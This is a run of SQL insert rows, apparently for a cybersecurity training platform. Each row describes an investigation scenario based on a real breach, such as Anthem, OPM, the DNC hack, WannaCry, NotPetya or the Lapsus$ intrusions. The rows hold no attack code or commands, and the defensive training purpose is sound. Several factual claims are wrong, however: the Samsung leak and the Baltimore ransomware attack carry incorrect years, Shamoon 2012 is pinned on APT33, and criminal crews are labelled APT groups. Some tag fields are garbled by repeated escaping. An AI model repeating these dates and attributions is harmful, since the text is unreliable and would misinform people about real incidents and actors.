(63, 'Operation Anthem Blues', 'Deep Panda (APT19)', 'Investigate Deep Panda\'s breach of Anthem, exposing 78.8M records via a phishing campaign and \'Derusbi\' malware.', 'In a chilling demonstration of stealth and strategy, APT19, also known as Deep Panda, executed a sophisticated cyberattack on Anthem, one of the largest health insurance providers in the United States. The breach resulted in the exposure of 78.8 million patient records, revealing a calculated phishing campaign targeting IT administrators, the deployment of custom \'Derusbi\' malware, and an unusual lack of encryption on the stolen database. As an investigator, you will delve into the intricacies of this operation, following the digital breadcrumbs left by the attackers.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Deep Panda\\\",\\\"Anthem breach\\\",\\\"cybersecurity training\\\",\\\"APT19\\\",\\\"Derusbi malware\\\"]\"', '', 5, '2026-01-11 23:41:38', 'Deep Panda\'s Infiltration: The Anthem Health Breach', 'Investigate Deep Panda\'s breach of Anthem, exposing 78.8M records via a phishing campaign and \'Derusbi\' malware.', 'operation-anthem-blues', 1),
(64, 'Operation OPM Heist', 'APT1 (Comment Crew) / Deep Panda', 'Analyze the OPM breach exposing federal data, focusing on PlugX RAT and counterintelligence implications.', 'In 2015, the U.S. Office of Personnel Management was breached by a sophisticated APT group, resulting in the compromise of 21.5 million federal employee records. This training scenario focuses on the deployment of the PlugX RAT, theft of fingerprint records, and the impact on national security through stolen SF-86 forms. Trainees will delve into the tactics and techniques used by the attackers, specifically APT1\'s strategic exploitation, persistence, and data exfiltration operations.', 'novice', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT1\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"OPM breach\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"PlugX RAT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"counterintelligence\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 3, '2026-01-11 23:43:46', 'Investigating the OPM Breach: Unraveling APT1\'s PlugX RAT Deployment', 'Analyze the OPM breach exposing federal data, focusing on PlugX RAT and counterintelligence implications.', 'operation-opm-heist', 1),
(65, 'Operation Marriott Checkout', 'APT1 (Chinese State-Sponsored)', 'Investigate APT1\'s stealthy breach of Marriott, analyzing RAT persistence and data encryption over four years.', 'In this operation, analysts are tasked with uncovering the sophisticated tactics employed by APT1, a Chinese state-sponsored group, in their prolonged and undetected breach of the Starwood/Marriott database. This breach, affecting 500 million guest records, showcases the group\'s expertise in maintaining persistence and evading detection through strategic use of Remote Access Trojans (RATs) and advanced data encryption. Participants will dive into the intricacies of the attack, focusing on the exposure of sensitive data such as passport numbers, and how the attackers leveraged the Starwood acquisition to their advantage.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"APT1\\\",\\\"Marriott Breach\\\",\\\"Cybersecurity Training\\\",\\\"Data Encryption\\\",\\\"Threat Intelligence\\\"]\"', '', 5, '2026-01-12 22:13:17', 'APT1 Infiltration: Unraveling the Starwood/Marriott Breach', 'Investigate APT1\'s stealthy breach of Marriott, analyzing RAT persistence and data encryption over four years.', 'operation-marriott-checkout', 1),
(66, 'Operation Capitol Breach', 'APT28 (Fancy Bear)', 'Analyze APT28\'s tactics in the 2016 DNC hack, focusing on X-Agent, X-Tunnel, and credential harvesting via spear-phishing.', 'In 2016, the Democratic National Committee was subjected to a sophisticated cyber attack that would become a pivotal moment in modern political history. The aggressive operation was attributed to APT28, a notorious Russian state-sponsored group known for its strategic cyber campaigns. This training scenario will delve into the group\'s use of X-Agent and X-Tunnel implants, the weaponization of stolen emails through WikiLeaks, and the spear-phishing techniques employed to harvest credentials, providing a comprehensive understanding of the cyber kill chain involved in this landmark attack.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"APT28\\\",\\\"DNC Hack\\\",\\\"Election Interference\\\",\\\"Cybersecurity Training\\\",\\\"Spear-Phishing\\\"]\"', '', 5, '2026-01-12 22:15:24', 'Investigating APT28\'s 2016 DNC Hack: A Comprehensive Training Scenario', 'Analyze APT28\'s tactics in the 2016 DNC hack, focusing on X-Agent, X-Tunnel, and credential harvesting via spear-phishing.', 'operation-capitol-breach', 1),
(67, 'Operation Shamoon Storm', 'APT33 (Elfin)', 'Dive into the analysis of APT33\'s Shamoon attack on Saudi Aramco, focusing on MBR overwrite and political motives.', 'In August 2012, a politically charged cyber assault shook the oil giant Saudi Aramco, wiping out data on 35,000 workstations. The attack, attributed to the notorious APT33 group, showcased a sophisticated MBR overwriting mechanism and left behind the telling image of a burning American flag. Investigators must dissect this complex attack, understanding the timing, motives, and techniques employed by the attackers.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"APT33\\\",\\\"Shamoon\\\",\\\"Saudi Aramco\\\",\\\"cybersecurity\\\",\\\"MBR overwrite\\\"]\"', '', 5, '2026-01-12 22:16:19', 'APT33 Shamoon Attack Investigation: Unraveling the Destruction of Saudi Aramco', 'Dive into the analysis of APT33\'s Shamoon attack on Saudi Aramco, focusing on MBR overwrite and political motives.', 'operation-shamoon-storm', 1),
(68, 'Operation Cobalt Factory', 'Cobalt Group', 'Investigate Cobalt Group\'s campaign targeting global ATM networks to prevent cyber heists.', 'The notorious Cobalt Group has launched a campaign targeting ATM infrastructures across more than 40 countries. Participants must unravel the complex web of ATM software manipulation, compromised card processing networks, and a sophisticated money mule operation. Your mission is to dissect each phase of the attack, understand the adversary\'s tactics, and devise strategies to thwart their efforts.', 'novice', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Cobalt Group\\\\\\\",\\\\\\\"ATM Cybersecurity\\\\\\\",\\\\\\\"Banking Threats\\\\\\\",\\\\\\\"Cyber Heist\\\\\\\",\\\\\\\"Financial Cybercrime\\\\\\\"]\\\"\"', '', 8, '2026-01-12 22:18:23', 'Cobalt Group ATM Heist Investigation Training', 'Investigate Cobalt Group\'s campaign targeting global ATM networks to prevent cyber heists.', 'operation-cobalt-factory', 1),
(69, 'Operation Swift Heist (Bangladesh)', 'Lazarus Group (APT38)', 'Explore the Lazarus Group\'s tactics in the $951 million Bangladesh Bank heist via SWIFT network manipulation.', 'In 2016, the cyber world was rocked by an audacious attempt to steal $951 million from the Bangladesh Bank. At the heart of this operation was the infamous Lazarus Group, a North Korean state-sponsored threat actor known for its cunning and precision. This training scenario will guide you through the investigation of this high-stakes heist. You will analyze the custom malware that concealed fraudulent transactions, the critical typo that thwarted the full theft, and how the stolen funds were laundered through Philippine casinos. Prepare yourself for an expert-level challenge in cyber threat intelligence analysis.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"Lazarus Group\\\",\\\"Bangladesh Bank Heist\\\",\\\"SWIFT network\\\",\\\"cybersecurity training\\\",\\\"APT38\\\"]\"', '', 7, '2026-01-12 22:18:54', 'Lazarus Group\'s Bangladesh Bank Heist Analysis', 'Explore the Lazarus Group\'s tactics in the $951 million Bangladesh Bank heist via SWIFT network manipulation.', 'operation-swift-heist-bangladesh', 1),
(70, 'Operation CCleaner', 'Barium (Winnti / APT41)', 'Investigate the CCleaner attack affecting 2.27M users, analyzing targeted espionage on 40 tech firms.', 'In September 2017, the world witnessed a massive supply chain attack on CCleaner, a popular utility tool. While 2.27 million users were affected, the true intent of the attack was far more sinister. Hidden within the chaos was a highly targeted espionage operation by APT41, surgically focused on 40 specific technology companies. Participants will delve into this complex scenario, tracing the steps of this notorious APT group and unveiling their covert objectives.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"CCleaner Supply Chain Attack\\\",\\\"APT41\\\",\\\"Cyber Espionage\\\",\\\"Technology Sector\\\",\\\"Supply Chain Security\\\"]\"', '', 3, '2026-01-12 22:24:29', 'Unveiling the CCleaner Supply Chain Attack by APT41', 'Investigate the CCleaner attack affecting 2.27M users, analyzing targeted espionage on 40 tech firms.', 'operation-ccleaner', 1),
(71, 'Operation Triton', 'EMP.Veles (Russian CNIIHM)', 'Learn to investigate the Triton/TRISIS malware targeting Triconex systems in a petrochemical plant by EMP.Veles.', 'In the heart of a bustling petrochemical plant, the hum of machinery is a constant backdrop. However, a sinister threat lurks beneath the surface. The notorious APT group, EMP.Veles, has set its sights on the plant\'s Schneider Electric Triconex safety systems. Their goal: to manipulate the safety instrumented systems (SIS) using the Triton/TRISIS malware, potentially causing catastrophic physical damage or even loss of life. As part of the cybersecurity response team, it is your mission to unravel this plot and prevent disaster.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Triton malware\\\",\\\"EMP.Veles\\\",\\\"Schneider Electric\\\",\\\"SIS\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-01-13 01:50:57', 'Beginner Training: Investigating Triton/TRISIS Attack by EMP.Veles', 'Learn to investigate the Triton/TRISIS malware targeting Triconex systems in a petrochemical plant by EMP.Veles.', 'operation-triton', 1),
(72, 'Operation Conti Ransomware', 'Conti', 'Simulate a response to Conti\'s attack on Ireland\'s HSE, focusing on data theft and system crippling.', 'In May 2021, the Conti ransomware group executed a highly sophisticated attack on Ireland\'s Health Service Executive (HSE), leading to the theft of 700GB of sensitive data and a temporary shutdown of critical healthcare systems, including COVID-19 vaccination services. While decryption keys were eventually provided, the attackers still leaked parts of the stolen data, raising questions about their motives and tactics. This training scenario will guide you through the steps of analyzing and responding to this complex cyber crisis.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Conti ransomware\\\",\\\"HSE cyberattack\\\",\\\"cybersecurity training\\\",\\\"data breach analysis\\\",\\\"novice cyber operations\\\"]\"', '', 3, '2026-01-13 01:55:42', 'Conti Ransomware Response Training: The HSE Attack', 'Simulate a response to Conti\'s attack on Ireland\'s HSE, focusing on data theft and system crippling.', 'operation-conti-ransomware', 1),
(73, 'Operation VPN Exploit', 'Hafnium', 'Investigate Hafnium\'s mass exploitation of VPNs targeting defense contractors and government agencies.', 'In early 2023, the notorious APT group Hafnium launched a coordinated attack targeting vulnerable VPN appliances. Utilizing authentication bypass vulnerabilities, they infiltrated networks of defense contractors and government agencies. Your mission is to investigate these breaches, analyze the persistence mechanisms, and understand the implications of these intrusions for national security.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Hafnium\\\",\\\"VPN exploitation\\\",\\\"defense contractors\\\",\\\"government agencies\\\",\\\"cybersecurity training\\\"]\"', '', 4, '2026-01-15 00:48:47', 'Hafnium\'s VPN Exploitation Tactics: A Cybersecurity Training Scenario', 'Investigate Hafnium\'s mass exploitation of VPNs targeting defense contractors and government agencies.', 'operation-vpn-exploit', 1),
(74, 'Operation Kaseya Cascade', 'REvil (Sodinokibi)', 'Investigate REvil\'s Kaseya VSA exploit targeting 1,500+ businesses via MSP supply chain compromise.', 'On the eve of Independence Day, a notorious APT group, REvil, executed a massive ransomware attack exploiting a zero-day vulnerability in Kaseya VSA software. This sophisticated supply chain compromise struck over 1,500 businesses in one fell swoop. Trainees will delve into the intricacies of this attack, from the initial infiltration to the decryption key acquisition, and explore the $70 million ransom demand that held global businesses at ransom.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"REvil\\\",\\\"Kaseya VSA\\\",\\\"ransomware\\\",\\\"supply chain attack\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-01-15 00:49:21', 'REvil\'s Supply Chain Infiltration: Kaseya VSA Exploit', 'Investigate REvil\'s Kaseya VSA exploit targeting 1,500+ businesses via MSP supply chain compromise.', 'operation-kaseya-cascade', 1),
(75, 'Operation Ukraine Grid 2016', 'Sandworm (Industroyer/CrashOverride)', 'Dive into Sandworm\'s 2016 Ukrainian power grid attack, analyzing the Industroyer malware framework\'s ICS protocol intricacies.', 'In December 2016, Ukraine faced a second debilitating cyberattack on its power grid, orchestrated by the notorious Sandworm group. Using the sophisticated Industroyer framework, this operation marked the first deployment of malware specifically tailored for electric grid systems. Your mission is to unravel the complexities of this attack, focusing on the threat actor\'s deep understanding of critical ICS protocols like IEC 101, IEC 104, and OPC, and the seamless coordination of multi-substation assaults.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Sandworm\\\",\\\"Industroyer\\\",\\\"ICS Protocols\\\",\\\"Cybersecurity Training\\\",\\\"Ukrainian Power Grid Attack\\\"]\"', '', 6, '2026-01-15 00:51:24', 'Investigate Sandworm\'s Industroyer Attack on Ukrainian Power Grid', 'Dive into Sandworm\'s 2016 Ukrainian power grid attack, analyzing the Industroyer malware framework\'s ICS protocol intricacies.', 'operation-ukraine-grid-2016', 1),
(76, 'Operation Capital One', 'Insider / Opportunistic', 'Investigate the Capital One breach involving AWS misconfiguration, SSRF attack, and insider IAM role abuse.', 'In July 2019, a massive data breach exposed 100 million credit applications at Capital One due to a sophisticated attack involving a misconfigured AWS Web Application Firewall (WAF). The breach was orchestrated by an insider with deep cloud expertise, leveraging a Server-Side Request Forgery (SSRF) attack vector and abusing IAM roles. Your mission is to analyze the attack sequence, identify the security gaps exploited, and understand the insider\'s motivations and methods.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"Capital One breach\\\",\\\"SSRF attack\\\",\\\"AWS misconfiguration\\\",\\\"insider threat\\\",\\\"IAM role abuse\\\"]\"', '', 5, '2026-01-15 00:52:37', 'Insider Threat: Capital One Cloud Breach Investigation', 'Investigate the Capital One breach involving AWS misconfiguration, SSRF attack, and insider IAM role abuse.', 'operation-capital-one', 1),
(77, 'Operation Twitter Takeover', 'Social Engineering / Insider', 'Investigate the Twitter hack targeting high-profile accounts via social engineering and insider threats, leading to a Bitcoin scam.', 'In the summer of 2020, Twitter faced a significant breach that saw high-profile accounts like Barack Obama, Elon Musk, and Bill Gates compromised. This operation examines the social engineering tactics used against Twitter employees, the exploitation of internal admin tools, and the ultimate cryptocurrency theft of $120,000. Participants will delve into the attack chain, understanding how insider threats can unravel even the most secure systems.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"social engineering\\\",\\\"Twitter hack\\\",\\\"insider threat\\\",\\\"Bitcoin scam\\\",\\\"cybersecurity training\\\"]\"', '', 4, '2026-01-15 00:55:02', 'Social Engineering Exploitation: The 2020 Twitter Hack', 'Investigate the Twitter hack targeting high-profile accounts via social engineering and insider threats, leading to a Bitcoin scam.', 'operation-twitter-takeover', 1),
(78, 'Operation Mimecast Compromise', 'APT29 (Nobelium/Cozy Bear)', 'Investigate APT29\'s strategic compromise of Mimecast certificates to infiltrate Microsoft 365 environments.', 'In the wake of the infamous SolarWinds attack, APT29 has launched a sophisticated campaign targeting Mimecast to exploit trust in the supply chain. Tasked with investigating the breach, analysts must uncover how stolen certificates facilitated unauthorized access to Microsoft 365 environments, threatening critical infrastructure and government entities.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"APT29\\\",\\\"Mimecast\\\",\\\"Microsoft 365\\\",\\\"Supply Chain Attacks\\\",\\\"Cybersecurity Training\\\"]\"', '', 5, '2026-01-15 00:55:32', 'APT29\'s Exploitation of Mimecast in SolarWinds Aftermath', 'Investigate APT29\'s strategic compromise of Mimecast certificates to infiltrate Microsoft 365 environments.', 'operation-mimecast-compromise', 1),
(79, 'Operation Uber Breach', 'Lapsus$ (Teen Hackers)', 'Investigate the 2022 Uber breach by Lapsus$ using advanced techniques like MFA fatigue and social engineering.', 'In 2022, the notorious teenage hacker group Lapsus$ launched a brazen attack on Uber, exploiting human vulnerabilities and technical gaps. Your mission is to dissect the breach, understand the attack vectors, and uncover the methods used to infiltrate and exfiltrate sensitive data. This scenario challenges you to think like an attacker and defend like a cybersecurity expert.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Lapsus$\\\",\\\"Uber breach\\\",\\\"MFA fatigue\\\",\\\"cybersecurity training\\\",\\\"APT simulation\\\"]\"', '', 7, '2026-01-15 00:55:57', 'Lapsus$ APT Simulation: Unraveling the Uber Breach', 'Investigate the 2022 Uber breach by Lapsus$ using advanced techniques like MFA fatigue and social engineering.', 'operation-uber-breach', 1),
(80, 'Operation LastPass Vault', 'Unknown (Targeted Attack)', 'Investigate the sophisticated LastPass breach affecting 30 million users by tracing initial access and assessing risks to encryption keys.', 'In an alarming breach affecting 30 million users, LastPass\'s encrypted vaults were compromised. The initial vector exploited a DevOps engineer\'s home computer, leading to the theft of critical cloud storage encryption keys. As part of a skilled cybersecurity team, you\'re tasked with dissecting this attack to uncover the unknown APT group behind it and determine the threat to users\' master passwords.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"LastPass breach\\\",\\\"APT investigation\\\",\\\"DevOps compromise\\\",\\\"encryption keys\\\",\\\"cybersecurity training\\\"]\"', '', 6, '2026-01-15 00:58:12', 'Advanced Analysis of LastPass Breach: DevOps Compromise Investigation', 'Investigate the sophisticated LastPass breach affecting 30 million users by tracing initial access and assessing risks to encryption keys.', 'operation-lastpass-vault', 1),
(81, 'Operation Okta Intrusion', 'Lapsus$ (DEV-0537)', 'Investigate the Okta breach by Lapsus$ through third-party access, focusing on the SuperUser portal and 366 affected customers.', 'In this expert-level training scenario, you will delve into the infamous Okta breach orchestrated by the Lapsus$ group. As a senior analyst, your mission is to unravel the complexities of this attack, which compromised 366 customers through a third-party support contractor. You will explore the implications on supply chain trust for identity-as-a-service providers and gain insights on securing the SuperUser portal.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"Okta breach\\\",\\\"Lapsus$\\\",\\\"supply chain attack\\\",\\\"identity-as-a-service\\\",\\\"cybersecurity\\\"]\"', '', 6, '2026-01-15 00:58:37', 'Advanced Cyber Training: Analyzing the Lapsus$ Okta Breach', 'Investigate the Okta breach by Lapsus$ through third-party access, focusing on the SuperUser portal and 366 affected customers.', 'operation-okta-intrusion', 1),
(82, 'Operation Nvidia Heist', 'Lapsus$', 'Investigate a 1TB data theft by Lapsus$, analyze extortion demands, and explore public spectacle tactics.', 'In a high-stakes cybercrime scenario, the notorious APT group Lapsus$ has struck again, claiming responsibility for the theft of 1TB of Nvidia\'s proprietary data. Among the stolen assets are GPU drivers, firmware, and code-signing certificates. Lapsus$ demands Nvidia to open-source their drivers, using unconventional public spectacle tactics to amplify their extortion. As part of an expert team, your mission is to dissect this complex breach, unravel the group\'s attack chain, and determine how they leveraged public disclosure to pressure Nvidia.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"Lapsus$\\\",\\\"Nvidia breach\\\",\\\"cybersecurity training\\\",\\\"APT investigation\\\",\\\"data theft\\\"]\"', '', 7, '2026-01-15 00:59:01', 'Advanced Cyber Ops Training: Lapsus$ Nvidia Breach Investigation', 'Investigate a 1TB data theft by Lapsus$, analyze extortion demands, and explore public spectacle tactics.', 'operation-nvidia-heist', 1),
(83, 'Operation Samsung Leak', 'Lapsus$', 'Intermediate-level scenario investigating Lapsus$ APT\'s theft of Samsung source code and extortion via Telegram.', 'In March 2023, the notorious APT group Lapsus$ executed a bold cyber heist, extracting 190GB of sensitive Samsung source code. This breach, targeting crucial Galaxy device components, sent shockwaves through the mobile security industry. Trainees must now dissect the attack\'s trajectory, unravel the Telegram-based extortion tactics, and assess the lasting impact on future security protocols.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Lapsus$\\\",\\\"Samsung breach\\\",\\\"cybersecurity training\\\",\\\"APT group\\\",\\\"mobile security\\\"]\"', '', 5, '2026-01-15 01:01:36', 'Lapsus$ APT: Samsung Source Code Breach Simulation', 'Intermediate-level scenario investigating Lapsus$ APT\'s theft of Samsung source code and extortion via Telegram.', 'operation-samsung-leak', 1),
(84, 'Operation Costa Rica', 'Conti', 'Investigate Conti\'s ransomware attack on Costa Rica, analyzing encryption tactics, ransom demands, and political messaging.', 'In April 2022, Costa Rica faced a national emergency when the notorious Conti group launched a ransomware attack on multiple government ministries. This operation will guide you through the investigation of how Conti encrypted critical systems, demanded a $20 million ransom, and issued politically charged messages, disrupting the nation\'s infrastructure.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Conti ransomware\\\",\\\"Costa Rica cyber attack\\\",\\\"APT group tactics\\\",\\\"ransomware investigation\\\",\\\"cybersecurity training\\\"]\"', '', 4, '2026-01-15 01:01:56', 'Conti Ransomware Attack on Costa Rica: A Cybersecurity Training Scenario', 'Investigate Conti\'s ransomware attack on Costa Rica, analyzing encryption tactics, ransom demands, and political messaging.', 'operation-costa-rica', 1),
(85, 'Operation WannaCry NHS', 'Lazarus Group', 'Investigate the WannaCry ransomware impact on NHS, focusing on unpatched systems, canceled surgeries, and kill-switch discovery.', 'In May 2017, the infamous Lazarus Group launched a global ransomware attack known as WannaCry, crippling over 80 NHS hospital trusts in the UK. This operation explores the devastating impact on healthcare services, highlighting the vulnerability of unpatched Windows XP systems, the chaos caused by canceled surgeries, and the serendipitous discovery of a kill-switch domain that halted further damage. Participants will delve into the intricacies of the attack, learning to identify and mitigate similar threats in the future.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"WannaCry\\\",\\\"Lazarus Group\\\",\\\"NHS Cyber Attack\\\",\\\"Ransomware\\\",\\\"Cybersecurity Training\\\"]\"', '', 6, '2026-01-15 01:02:19', 'Advanced Analysis of Lazarus Group\'s Impact on WannaCry NHS Attack', 'Investigate the WannaCry ransomware impact on NHS, focusing on unpatched systems, canceled surgeries, and kill-switch discovery.', 'operation-wannacry-nhs', 1),
(86, 'Operation City of Atlanta', 'SamSam (Iranian Hackers)', 'Expert scenario to dissect SamSam\'s ransomware attack on Atlanta, focusing on RDP brute-force and $51,000 ransom demand.', 'In March 2018, Atlanta\'s municipal services were brought to a standstill by a devastating ransomware attack orchestrated by the notorious Iranian hacker group, SamSam. The attack, which leveraged brute-force tactics to gain access via Remote Desktop Protocol (RDP), led to a ransom demand of $51,000. However, the true cost of recovery soared to an estimated $17 million. Participants are tasked with tracing the steps of this attack, from initial access to the eventual exfiltration, in a comprehensive cybersecurity investigation.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"SamSam ransomware\\\",\\\"Atlanta attack\\\",\\\"RDP brute-force\\\",\\\"cybersecurity training\\\",\\\"APT group\\\"]\"', '', 6, '2026-01-15 01:02:46', 'Cybersecurity Operation: Unraveling SamSam\'s Ransomware Attack on Atlanta', 'Expert scenario to dissect SamSam\'s ransomware attack on Atlanta, focusing on RDP brute-force and $51,000 ransom demand.', 'operation-city-of-atlanta', 1),
(87, 'Operation Baltimore', 'RobbinHood', 'Investigate and analyze the RobbinHood ransomware attack exploiting Baltimore\'s systems via a vulnerable remote access tool.', 'In early 2023, Baltimore\'s city systems were hit by a devastating ransomware attack perpetrated by the notorious APT group, RobbinHood. Over several months, key operations were hindered, causing widespread impact. The city made headlines with its controversial decision to refuse ransom payment, leaving systems crippled. Your mission is to delve into the intricacies of the attack, focusing on the exploitation of a vulnerable remote access tool, to piece together the attack chain and provide actionable insights.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"RobbinHood\\\",\\\"ransomware attack\\\",\\\"Baltimore city systems\\\",\\\"cybersecurity training\\\",\\\"APT group\\\"]\"', '', 5, '2026-01-17 03:36:38', 'RobbinHood Ransomware Attack on Baltimore City Systems', 'Investigate and analyze the RobbinHood ransomware attack exploiting Baltimore\'s systems via a vulnerable remote access tool.', 'operation-baltimore', 1),
(88, 'Operation Garmin Outage', 'Evil Corp (WastedLocker)', 'Investigate Evil Corp\'s WastedLocker ransomware attack on Garmin, analyze a $10 million ransom and aviation service disruption.', 'In this training scenario, participants will dive into the infamous WastedLocker ransomware attack orchestrated by Evil Corp that crippled Garmin\'s operations. The attack not only demanded a staggering $10 million ransom but also highlighted vulnerabilities in aviation services, raising significant concerns about sanctions evasion. Trainees will follow the digital breadcrumbs left by the attackers, piecing together the sophisticated tactics, techniques, and procedures that led to one of the most notable cyber incidents of recent times.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Evil Corp\\\",\\\"WastedLocker\\\",\\\"ransomware\\\",\\\"Garmin attack\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-01-17 03:37:30', 'Evil Corp WastedLocker Attack Simulation on Garmin', 'Investigate Evil Corp\'s WastedLocker ransomware attack on Garmin, analyze a $10 million ransom and aviation service disruption.', 'operation-garmin-outage', 1),
(89, 'Operation Norsk Hydro', 'LockerGoga', 'Advanced training on investigating LockerGoga\'s ransomware impact on aluminum giant, focusing on backup restoration and manual operations.', 'In early 2019, a major aluminum manufacturing giant faced a severe ransomware attack by the notorious APT group, LockerGoga. The company, refusing to succumb to demands, decided to restore from backups, incurring a significant $75 million impact. This operation simulation takes you through the stages of the attack, the strategic decision to switch to manual operations, and the subsequent investigation into the incident.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"LockerGoga\\\",\\\"ransomware\\\",\\\"cybersecurity\\\",\\\"APT\\\",\\\"backup restoration\\\"]\"', '', 6, '2026-01-17 03:38:07', 'LockerGoga Ransomware Attack Simulation on Aluminum Manufacturing', 'Advanced training on investigating LockerGoga\'s ransomware impact on aluminum giant, focusing on backup restoration and manual operations.', 'operation-norsk-hydro', 1),
(90, 'Operation Maersk NotPetya', 'Sandworm', 'Explore Maersk\'s recovery from the $300M NotPetya attack with analysis of IT rebuild and strategic incident response.', 'In 2017, the world witnessed one of the most devastating cyberattacks in history when the NotPetya malware struck, inflicting over $10 billion in damages globally. Among its victims was Maersk, the world\'s largest shipping company, whose operations ground to a halt, resulting in a $300 million impact. This training scenario dives into the intricate investigation of the attack, focusing on the complete IT infrastructure rebuild, the serendipitous discovery of a functional domain controller in Ghana, and the relentless 10-day recovery effort.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"NotPetya\\\",\\\"cyberattack recovery\\\",\\\"Maersk\\\",\\\"cybersecurity training\\\",\\\"Sandworm APT\\\"]\"', '', 3, '2026-01-17 03:39:02', 'NotPetya Aftermath: Rebuilding Maersk\'s IT Infrastructure', 'Explore Maersk\'s recovery from the $300M NotPetya attack with analysis of IT rebuild and strategic incident response.', 'operation-maersk-notpetya', 1),
(91, 'Operation Merck Disruption', 'Sandworm (NotPetya)', 'Investigate the $1.4B NotPetya impact on pharmaceuticals and the cyber insurance \'act of war\' legal battle.', 'In the wake of the infamous NotPetya attack, the pharmaceutical industry faced unprecedented challenges. Operations worth $1.4 billion were disrupted, particularly affecting vaccine production. As Sandworm\'s malicious campaign unfolded, questions arose about the adequacy of cyber insurance coverage, sparking a landmark legal battle over \'act of war\' exclusions. In this expert-level training scenario, participants will delve into the intricate details of Sandworm\'s tactics and the ensuing fallout.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"NotPetya\\\",\\\"Sandworm\\\",\\\"Cyber Insurance\\\",\\\"Pharmaceutical Cybersecurity\\\",\\\"APT Training\\\"]\"', '', 7, '2026-01-17 03:40:33', 'Expert Cybersecurity Training: Analyzing NotPetya\'s Impact on Pharma', 'Investigate the $1.4B NotPetya impact on pharmaceuticals and the cyber insurance \'act of war\' legal battle.', 'operation-merck-disruption', 1),
(92, 'Operation FedEx TNT', 'Sandworm (NotPetya)', 'Explore the $400M NotPetya impact on FedEx\'s TNT Express. Analyze data loss and integration challenges in this intermediate training scenario.', 'In 2017, the notorious APT group Sandworm unleashed the NotPetya cyberattack, which rippled across the globe, causing billions in damage. Among its victims was FedEx\'s TNT Express, suffering a staggering $400 million impact. Trainees will dive into the depths of this attack, exploring the permanent data loss in legacy systems and the integration challenges that magnified the damage. As you investigate, you\'ll uncover the motives, methods, and missteps that defined this cataclysmic event.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"NotPetya\\\",\\\"Sandworm\\\",\\\"FedEx\\\",\\\"Cybersecurity Training\\\",\\\"APT Group\\\"]\"', '', 5, '2026-01-17 03:41:03', 'NotPetya Impact Analysis on FedEx\'s TNT Express: A Cyber Operation Case Study', 'Explore the $400M NotPetya impact on FedEx\'s TNT Express. Analyze data loss and integration challenges in this intermediate training scenario.', 'operation-fedex-tnt', 1),
(93, 'Operation Ronin Bridge', 'Lazarus Group', 'Investigate the Ronin Bridge hack, uncover compromised keys, and follow blockchain forensics in this beginner-level cyber operation.', 'In March 2022, the Ronin Bridge network suffered a staggering $625 million cryptocurrency theft, marking it as the largest crypto hack in history. At the heart of this operation is the notorious Lazarus Group, a North Korean cybercrime syndicate known for its sophisticated financial heists. As a budding cyber threat intelligence analyst, you are tasked with piecing together how this attack unfolded, tracking the compromised validator keys, and following the complex trail of stolen funds through blockchain forensics.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Ronin Bridge hack\\\",\\\"Lazarus Group\\\",\\\"cryptocurrency theft\\\",\\\"cybersecurity training\\\",\\\"blockchain forensics\\\"]\"', '', 5, '2026-01-17 03:41:32', 'Lazarus Group\'s Ronin Bridge Cryptocurrency Heist Investigation', 'Investigate the Ronin Bridge hack, uncover compromised keys, and follow blockchain forensics in this beginner-level cyber operation.', 'operation-ronin-bridge', 1),
(94, 'Operation Harmony Bridge', 'Lazarus Group', 'Investigate the Harmony Protocol bridge heist by Lazarus Group, focusing on compromised multi-sig schemes and crypto laundering.', 'In the heart of the cryptocurrency realm, a staggering $100 million has vanished from Harmony Protocol\'s bridge. The infamous Lazarus Group is suspected, leveraging its expertise in financial theft to crack the multi-sig scheme. Analysts must dive into the remnants of this cyber theft, unraveling the threads of a North Korean cryptocurrency laundering operation.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Lazarus Group\\\",\\\"Harmony Protocol\\\",\\\"cryptocurrency theft\\\",\\\"APT investigation\\\",\\\"cybersecurity training\\\"]\"', '', 3, '2026-01-17 03:44:07', 'Lazarus Group\'s $100M Crypto Heist Investigation', 'Investigate the Harmony Protocol bridge heist by Lazarus Group, focusing on compromised multi-sig schemes and crypto laundering.', 'operation-harmony-bridge', 1),
